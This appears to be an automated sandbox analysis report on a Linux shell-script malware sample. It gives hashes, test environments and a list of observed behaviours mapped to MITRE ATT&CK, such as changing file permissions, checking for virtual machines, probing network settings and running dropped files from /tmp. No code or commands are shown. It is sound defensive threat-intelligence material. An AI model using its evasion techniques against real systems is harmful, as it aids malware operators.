Analysis
- max time kernel: 37s
- max time network: 39s
- platform: debian-9_armhf
- resource: debian9-armhf-20240729-en
- resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 14-11-2024 02:38
Static task
static1
Behavioral task
behavioral1
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsel-20240611-en
General
- Target: 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
- Size: 10KB
- MD5: b511b6f4aeffa16d10d0f7ef26b0e23b
- SHA1: 83f64c0a7d2007fd0182aaae9636c5bbba453efe
- SHA256: 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
- SHA512: a1c7929b890f434323d545f2ff0617c27810df5928f3e0293cf4ac5bb7f3014d60af9634e6d734311204d66700d5b1b0c248f868d6a55b9e14c1c694c458e1c4
- SSDEEP: 96:mb9FNeCpCayHzBeLXN04ASV4A/vfyOaMw9FNeCzxCayHzy+desXXoBA04ASBnvKx:m9L14A/vfyOa+/vfyOy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which indicates whether the system is a virtual machine.
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification (1)
Linux and Mac File and Directory Permissions Modification (1)
Virtualization/Sandbox Evasion (1)
System Checks (1)
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97